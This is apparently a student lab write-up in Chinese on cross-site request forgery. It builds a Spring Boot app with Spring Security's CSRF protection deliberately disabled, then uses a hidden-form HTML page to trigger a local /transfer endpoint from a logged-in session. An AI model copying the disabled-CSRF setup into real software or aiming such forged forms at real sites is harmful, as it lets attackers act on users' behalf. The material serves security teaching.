数据库实验5-跨站请求伪造攻击实验
前言
该方式已经尽全力来简化操作流程。
创建项目
新建一个Spring Boot项目:
data:image/s3,"s3://crabby-images/aa078/aa07826a18080295493f378dc16457f77c85cc9b" alt="image-20220504174047971"
data:image/s3,"s3://crabby-images/c76d9/c76d92c429effc603359c0b5333fcd6b41112477" alt="image-20220504174051214"
勾选:
data:image/s3,"s3://crabby-images/45cc9/45cc99e00aeacc4e0058706c6ca893b63a8ffc47" alt="image-20220504174053777"
data:image/s3,"s3://crabby-images/b9e6d/b9e6dbcb33509acbca8943e48d78057d7f0663ff" alt="image-20220504174056983"
data:image/s3,"s3://crabby-images/f0985/f0985fff82e7c61ce3d067e0b036a1291c79d4e1" alt="image-20220504174100141"
创建后如图所示:
data:image/s3,"s3://crabby-images/9f9e4/9f9e43f0b412d92abb73b97a9902dd840ad5f3e9" alt="image-20220504174102775"
创建config文件夹并配置关闭SpringSecurity的CSRF验证接口:
data:image/s3,"s3://crabby-images/afb08/afb08e71529ba9b02bce7304982c66b2cc371fb1" alt="image-20220504174105995"
代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| package com.example.demo.config;
import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
@Configuration public class SecurityConfig extends WebSecurityConfigurerAdapter { @Override protected void configure(HttpSecurity http) throws Exception { http.authorizeRequests().anyRequest().authenticated() .and() .formLogin() .and() .csrf() .disable(); } }
|
之后创建调试接口:
data:image/s3,"s3://crabby-images/c182a/c182a382e3e8fbc42597d765d7a1b411da8711a0" alt="image-20220505202518506"
代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| package com.example.demo.controller;
import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController;
@RestController public class HelloController { @RequestMapping("/transfer") public void Success(String name) { System.out.println("现在操作的标识符 = " + name); } @GetMapping("/hello") public String hello() { return "hello"; } }
|
在application.properties内配置好账号密码:
data:image/s3,"s3://crabby-images/c2eaf/c2eaf771ad9a2ae25b077d8a943aed888e1b5d00" alt="image-20220504174109076"
配置完毕。
创建项目2
在VSCode内,复制粘贴如下代码:
1 2 3 4 5 6 7 8 9
| <!DOCTYPE html> <html> <body> <form action="http://127.0.0.1:8080/transfer" method="post"> <input type="hidden" value="我是你爷爷" name="name"> <input type="submit" value="点击一下我"> </form> </body> </html>
|
保存为html,如下:
data:image/s3,"s3://crabby-images/d8a23/d8a232bfcdb3ca2bb58f402ca35161e99b449947" alt="image-20220504174113048"
开始攻击测试
右键 - 在浏览器中打开,如图所示:
data:image/s3,"s3://crabby-images/1b302/1b302b5d31a647c78310e83b88a8bc793f4c9e76" alt="image-20220504174115945"
之后在相同浏览器内新建一个标签页,访问:127.0.0.1:8080
由于没有登录,自动跳转到登录页面:
data:image/s3,"s3://crabby-images/1ff09/1ff09fd14d5495e4b2d3fa0ee8cba1b1a3e85d5b" alt="image-20220504174119310"
输入账号密码(在application.properties内配置好的那个),点击Sign in:
data:image/s3,"s3://crabby-images/008c8/008c8e7dd6bbe0986c89aba647e0e112ac522c70" alt="image-20220504174122249"
登录成功(没有写对应的页面),我们自己手动访问一下transfer接口:
data:image/s3,"s3://crabby-images/38140/38140e05abf4dabfca26d0f852a1aa4d35d112a4" alt="image-20220504174125095"
data:image/s3,"s3://crabby-images/10a3f/10a3f54c6499f78d007fa9af1121aa9d89eefcae" alt="image-20220504174130853"
查看后台:
data:image/s3,"s3://crabby-images/9f8e0/9f8e02fd3b5645581f95e23191d79b6cc059c3f0" alt="image-20220504174133440"
接下来我们关闭这个页面,回到刚才Vscode的那个页面上:
data:image/s3,"s3://crabby-images/46690/46690a3f1482a3a301558cb799dc2bb33718ab0c" alt="image-20220504174136383"
点击“点击一下我”
data:image/s3,"s3://crabby-images/b0ac3/b0ac3b3b17f0288d7674dc774461200401f12640" alt="image-20220504174139356"
可以看到,在没有再次登录的情况下,在Vscode(服务器为http://localhost:52330/)的接口调用成功了。)
查看后台:data:image/s3,"s3://crabby-images/92629/926293c554b89646c6d507c2a76cfc739f81eb10" alt="image-20220504174142006"
故攻击成功。